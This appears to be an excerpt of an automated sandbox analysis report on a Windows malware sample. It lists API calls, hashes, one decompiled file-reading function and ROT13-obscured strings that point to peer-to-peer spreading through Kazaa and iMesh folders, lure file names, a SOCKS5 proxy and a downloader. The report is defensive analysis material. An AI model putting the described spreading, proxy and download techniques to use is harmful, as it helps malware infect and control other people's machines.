                                                                          • String ID: fngbeanf.qyy$nhgbeha.vas$x
                                                                          • API String ID: 1674407683-3747760128
                                                                          • Opcode ID: a781d3461717b306554f03ee67c14ce0aa3dc3647b02a65b4a03f677e82d5d21
                                                                          • Instruction ID: ef6cf4129608155cc112f4a97fe144a2978ba8a5c429c4c3aaf2c51783ef7b88
                                                                          • Opcode Fuzzy Hash: a781d3461717b306554f03ee67c14ce0aa3dc3647b02a65b4a03f677e82d5d21
                                                                          • Instruction Fuzzy Hash: 01313BB0808704DAD710BF65D58539EBBF4AF84318F41897EE8C867282D77C9598CB9B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseHandle$Create$MappingSizeView
                                                                          • String ID:
                                                                          • API String ID: 3733816638-0
                                                                          • Opcode ID: 28ad9512942125c148e9156a3630da42204dd69e6c08cca65b9db14b0c4ba9a3
                                                                          • Instruction ID: 986d351c7ed07d29ba8de43e54e9a7d5c311c5fefbca7bada34d70547d36c5f0
                                                                          • Opcode Fuzzy Hash: 28ad9512942125c148e9156a3630da42204dd69e6c08cca65b9db14b0c4ba9a3
                                                                          • Instruction Fuzzy Hash: 0F513FB59043059BDB10AF25C99535EBFF4AF81348F1089AEE488673C1D779DA88CB87
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
                                                                          • String ID: Fbsgjner\Xnmnn\Genafsre$QyQve0
                                                                          • API String ID: 3255004976-3635034446
                                                                          • Opcode ID: 96bb27e789c0454cfa1d7dd6218e760f1b91c58a1b94f5de8dcecc10dbf1df5e
                                                                          • Instruction ID: afcb269cad9b4d3002b0b3817e33f6dff803cc776bda76573fbb9b1efc1f5d05
                                                                          • Opcode Fuzzy Hash: 96bb27e789c0454cfa1d7dd6218e760f1b91c58a1b94f5de8dcecc10dbf1df5e
                                                                          • Instruction Fuzzy Hash: 0751FBB4D05718DBDB50EF24C58939EBBF0AF44304F4189BED88867381D7789A888F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$lstrcat$CloseCopyFileOpenQueryValuelstrcpy
                                                                          • String ID: Fbsgjner\vZrfu\Trareny$QbjaybnqQve
                                                                          • API String ID: 3255004976-427315093
                                                                          • Opcode ID: 94e05c4d2cf339448625aa2dd311526b15f0b73e23a95898dc47c488b5c81944
                                                                          • Instruction ID: 4c2f52c761e00ed0f591be26c1bd4671a41acc1e7387a317ba9ae8b83013203e
                                                                          • Opcode Fuzzy Hash: 94e05c4d2cf339448625aa2dd311526b15f0b73e23a95898dc47c488b5c81944
                                                                          • Instruction Fuzzy Hash: D051FCB4905718CEDB60EF24C58939EBBF4AF44304F4185BEDC8867381D7789A888F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 19%
                                                                          			E004017F8(signed int __edx, CHAR* _a4, intOrPtr* _a8) {
                                                                          				void* _v16;
                                                                          				DWORD* _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				void* _v36;
                                                                          				void* _v40;
                                                                          				void* _v44;
                                                                          				void* _v48;
                                                                          				signed int _v52;
                                                                          				DWORD* _v56;
                                                                          				signed int _v60;
                                                                          				DWORD* _v64;
                                                                          				signed int _t50;
                                                                          				void* _t54;
                                                                          				void* _t55;
                                                                          				int _t58;
                                                                          				DWORD* _t62;
                                                                          				void* _t65;
                                                                          				void* _t68;
                                                                          				DWORD* _t73;
                                                                          				signed int _t74;
                                                                          				void* _t86;
                                                                          				DWORD* _t88;
                                                                          				void* _t89;
                                                                          				void* _t90;
                                                                          				void** _t92;
                                                                          				void** _t93;
                                                                          				void** _t94;
                                                                          
                                                                          				_t74 = __edx;
                                                                          				_v20 = 0;
                                                                          				_t50 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0xa7, 0);
                                                                          				_t90 = _t89 - 0x1c;
                                                                          				_t86 = _t50;
                                                                          				_t73 = 0;
                                                                          				if((_t74 & 0xffffff00 | _t50 == 0xffffffff | _t50 & 0xffffff00 | _t50 == 0x00000000) == 0) {
                                                                          					_v24 = GetFileSize(_t86, 0);
                                                                          					_t54 = GetProcessHeap();
                                                                          					_v52 = _v24;
                                                                          					_v56 = 0;
                                                                          					_t55 = RtlAllocateHeap(_t54);
                                                                          					_t92 = _t90 - 0xfffffffffffffffc;
                                                                          					_v28 = _t55;
                                                                          					if(_t55 != 0) {
                                                                          						_v52 = 0;
                                                                          						_v56 =  &_v20;
                                                                          						_v60 = _v24;
                                                                          						_v64 = _v28;
                                                                          						 *_t92 = _t86;
                                                                          						_t58 = ReadFile(??, ??, ??, ??, ??);
                                                                          						_t93 = _t92 - 0x14;
                                                                          						if(_t58 != 0) {
                                                                          							_t88 = 1 + ((0xb + _v24 * 4) * 0xaaaaaaab >> 0x20 >> 3) * 4;
                                                                          							_v64 = _t88;
                                                                          							 *_t93 = 0x40;
                                                                          							_t62 = GlobalAlloc(??, ??);
                                                                          							_t94 = _t93 - 8;
                                                                          							_v56 = _t88;
                                                                          							_v60 = _t62;
                                                                          							_v64 = _v24;
                                                                          							 *_t94 = _v28;
                                                                          							 *_a8 = E00401996(_v28, _v24);
                                                                          							_t65 = GetProcessHeap();
                                                                          							_v60 = _v28;
                                                                          							_v64 = 0;
                                                                          							 *_t94 = _t65;
                                                                          							HeapFree(??, ??, ??);
                                                                          							 *(_t94 - 0xc) = _t86;
                                                                          							CloseHandle(??);
                                                                          							_t73 = _t62;
                                                                          						} else {
                                                                          							_t68 = GetProcessHeap();
                                                                          							_v60 = _v28;
                                                                          							_v64 = 0;
                                                                          							 *_t93 = _t68;
                                                                          							HeapFree(??, ??, ??);
                                                                          							 *(_t93 - 0xc) = _t86;
                                                                          							CloseHandle(??);
                                                                          							_t73 = 0;
                                                                          						}
                                                                          					} else {
                                                                          						 *_t92 = _t86;
                                                                          						CloseHandle(??);
                                                                          						_t73 = 0;
                                                                          					}
                                                                          				}
                                                                          				return _t73;
                                                                          			}































                                                                          0x004017f8
                                                                          0x00401801
                                                                          0x0040183e
                                                                          0x00401843
                                                                          0x00401846
                                                                          0x00401853
                                                                          0x0040185a
                                                                          0x00401873
                                                                          0x00401876
                                                                          0x0040187e
                                                                          0x00401882
                                                                          0x0040188d
                                                                          0x00401892
                                                                          0x00401895
                                                                          0x0040189a
                                                                          0x004018b1
                                                                          0x004018bc
                                                                          0x004018c3
                                                                          0x004018ca
                                                                          0x004018ce
                                                                          0x004018d1
                                                                          0x004018d6
                                                                          0x004018db
                                                                          0x00401924
                                                                          0x0040192b
                                                                          0x0040192f
                                                                          0x00401936
                                                                          0x0040193b
                                                                          0x00401940
                                                                          0x00401944
                                                                          0x0040194b
                                                                          0x00401952
                                                                          0x0040195d
                                                                          0x0040195f
                                                                          0x00401967
                                                                          0x0040196b
                                                                          0x00401973
                                                                          0x00401976
                                                                          0x0040197e
                                                                          0x00401981
                                                                          0x00401989
                                                                          0x004018dd
                                                                          0x004018dd
                                                                          0x004018e5
                                                                          0x004018e9
                                                                          0x004018f1
                                                                          0x004018f4
                                                                          0x004018fc
                                                                          0x004018ff
                                                                          0x00401907
                                                                          0x00401907
                                                                          0x0040189c
                                                                          0x0040189c
                                                                          0x0040189f
                                                                          0x004018a7
                                                                          0x004018a7
                                                                          0x0040189a
                                                                          0x00401994

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$File$CloseHandleProcess$AllocateCreateFreeReadSize
                                                                          • String ID:
                                                                          • API String ID: 1447158257-0
                                                                          • Opcode ID: 3f111dcaf8cf3b0762ed0ef5d64caf3b4e836ab70030ef84dcd2666f8baf838a
                                                                          • Instruction ID: 56d12447d5e111c6f88c9cc84d084cd75ca963f9ae61866c417ed6db83e02629
                                                                          • Opcode Fuzzy Hash: 3f111dcaf8cf3b0762ed0ef5d64caf3b4e836ab70030ef84dcd2666f8baf838a
                                                                          • Instruction Fuzzy Hash: 614119B1904705DBD700EFA9C18536EBFF0AF84304F108A3EE884A7791D7799949CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Socks5Accept.SHERVANS ref: 10001CAE
                                                                            • Part of subcall function 10001BBE: sread.SHERVANS ref: 10001BE6
                                                                            • Part of subcall function 10001BBE: sread.SHERVANS ref: 10001C20
                                                                            • Part of subcall function 10001BBE: swrite.SHERVANS ref: 10001C61
                                                                            • Part of subcall function 10001BBE: Socks5Auth.SHERVANS ref: 10001C76
                                                                          • Socks5GetCmd.SHERVANS ref: 10001CE0
                                                                            • Part of subcall function 100017DF: sread.SHERVANS ref: 10001806
                                                                          • Socks5CmdIsSupported.SHERVANS ref: 10001D0D
                                                                            • Part of subcall function 1000153E: Socks5SendCode.SHERVANS ref: 10001572
                                                                          • Socks5ServConnect.SHERVANS ref: 10001D36
                                                                            • Part of subcall function 10001451: socket.WS2_32 ref: 10001482
                                                                            • Part of subcall function 10001451: Socks5SendCode.SHERVANS ref: 100014B1
                                                                          • Socks5SendCode.SHERVANS ref: 10001D63
                                                                            • Part of subcall function 1000140F: swrite.SHERVANS ref: 1000144A
                                                                          • CreateConnectStruct.SHERVANS ref: 10001D79
                                                                            • Part of subcall function 100011DB: _malloc.SHERVANS ref: 100011F4
                                                                          • create_thread.SHERVANS ref: 10001D91
                                                                            • Part of subcall function 10001180: CreateThread.KERNEL32 ref: 100011B3
                                                                          • SocksPipe@4.SHERVANS ref: 10001D99
                                                                            • Part of subcall function 100012E4: swrite.SHERVANS ref: 10001337
                                                                          • closesocket.WS2_32 ref: 10001DB1
                                                                          • closesocket.WS2_32 ref: 10001DBC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Socks5$CodeSendsreadswrite$ConnectCreateclosesocket$AcceptAuthPipe@4ServSocksStructSupportedThread_malloccreate_threadsocket
                                                                          • String ID:
                                                                          • API String ID: 3751663279-0
                                                                          • Opcode ID: a2bd8abaf4e674468f1f84b6ef6117d609ec6930b513e553faca06ef849a4ba0
                                                                          • Instruction ID: 4b573f6a928498a40c2cc82285d3d9912bf6b4ab208de6b3f8843c6836bde082
                                                                          • Opcode Fuzzy Hash: a2bd8abaf4e674468f1f84b6ef6117d609ec6930b513e553faca06ef849a4ba0
                                                                          • Instruction Fuzzy Hash: 8531C8B88083189FD750DF65C4812DEBBF4EF48750F0189AEE99997305E7749A94CF82
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDeleteFileFreeLoadProcSleep
                                                                          • String ID: URLDownloadToFileA$donzx.dll$urlmon.dll
                                                                          • API String ID: 1591209584-4102153241
                                                                          • Opcode ID: 822e4242d846e3181e51de55bcfb4708a5aec733e92b39760985a308414817cb
                                                                          • Instruction ID: 543b2787c70849a237c7d5d5e8862ee058c6e2dedd7614c5b7d168295bf2944d
                                                                          • Opcode Fuzzy Hash: 822e4242d846e3181e51de55bcfb4708a5aec733e92b39760985a308414817cb
                                                                          • Instruction Fuzzy Hash: 1C21FCB09043459BD700EF39D58579ABBF0BB48304F108A7EE98997341E778D998CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$CountTickrandsrand
                                                                          • String ID: mvcsvnd.qyy
                                                                          • API String ID: 2629717045-1605320677
                                                                          • Opcode ID: b637c6e49b961f897a22e2996b1a65de55874454525e38e3c73dff940bc89bf3
                                                                          • Instruction ID: 3c31970993b76fcb6f62e82551040ecc98f125b31847a965db22ab4f080a2362
                                                                          • Opcode Fuzzy Hash: b637c6e49b961f897a22e2996b1a65de55874454525e38e3c73dff940bc89bf3
                                                                          • Instruction Fuzzy Hash: F441FBB59043048BCB10BF65D98569DBBF0BF84314F40897FE584A7381EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                            • Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 004082DE
                                                                            • Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 00408336
                                                                            • Part of subcall function 0040829C: CloseHandle.KERNEL32 ref: 00408356
                                                                            • Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408409
                                                                            • Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408422
                                                                            • Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 00408436
                                                                            • Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 00408480
                                                                            • Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 0040848E
                                                                            • Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 004084BC
                                                                            • Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 004084CA
                                                                            • Part of subcall function 0040829C: SetFilePointer.KERNEL32 ref: 004084F0
                                                                            • Part of subcall function 0040829C: ReadFile.KERNEL32 ref: 00408529
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          • Sleep.KERNEL32 ref: 00403BC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$lstrlen$CreateHandleSizeWritelstrcat$CloseConnectedDirectoryInternetLibraryLoadModulePointerReadSleepStateSystemmemset
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$Readme.exe$fgngrz$foto.pif$mvcsv.qyy$mvcsvnd.qyy$tepbcl.qyy$x
                                                                          • API String ID: 1266463258-727612787
                                                                          • Opcode ID: 4f08fd3119f6ef70fbf57858498a347b0345bdf901e6be3e447fbd951a2ad8b7
                                                                          • Instruction ID: aba1e27b33e5380b7e2637a9dd0f7b6f92beebfe16ff9740c24b48d29de174a4
                                                                          • Opcode Fuzzy Hash: 4f08fd3119f6ef70fbf57858498a347b0345bdf901e6be3e447fbd951a2ad8b7
                                                                          • Instruction Fuzzy Hash: 00313BB08097159AD310BF22C58529EBBE4AF80749F41CC7EF5C867281DB3C9689DB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: closesocketshutdown$FreeGlobalSleepsendswrite
                                                                          • String ID:
                                                                          • API String ID: 1878692053-0
                                                                          • Opcode ID: e0839c0ce4ee56aa669c213a4fa6ec1e94d32b6c2ce99eb8bfe8c713ce6150e8
                                                                          • Instruction ID: 48072c1fa49bddfcfd526dd8cb4adb201c308eb4763bb1a22db86958bf961fa8
                                                                          • Opcode Fuzzy Hash: e0839c0ce4ee56aa669c213a4fa6ec1e94d32b6c2ce99eb8bfe8c713ce6150e8
                                                                          • Instruction Fuzzy Hash: 7E311CB0608240CBEB02EF79C5C579ABFE4EF01390F0585A8ED848F25AD775E945CB62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • strchr.MSVCRT ref: 00405F28
                                                                          • GetProcessHeap.KERNEL32 ref: 00405F38
                                                                            • Part of subcall function 00409250: malloc.MSVCRT ref: 004092A3
                                                                            • Part of subcall function 004060AA: DnsQuery_A.DNSAPI ref: 004060E7
                                                                            • Part of subcall function 004060AA: GetProcessHeap.KERNEL32 ref: 0040610A
                                                                            • Part of subcall function 004060AA: RtlAllocateHeap.NTDLL ref: 00406122
                                                                            • Part of subcall function 004060AA: lstrcpy.KERNEL32 ref: 00406144
                                                                            • Part of subcall function 004060AA: GlobalFree.KERNEL32 ref: 00406182
                                                                          • GetProcessHeap.KERNEL32 ref: 00406049
                                                                          • HeapFree.KERNEL32 ref: 00406060
                                                                            • Part of subcall function 0040619A: memset.MSVCRT ref: 004061C4
                                                                            • Part of subcall function 0040619A: GetSystemTime.KERNEL32 ref: 00406249
                                                                            • Part of subcall function 0040619A: wsprintfA.USER32 ref: 004062BD
                                                                            • Part of subcall function 0040619A: socket.WS2_32 ref: 004062D9
                                                                            • Part of subcall function 0040619A: htons.WS2_32 ref: 004062F9
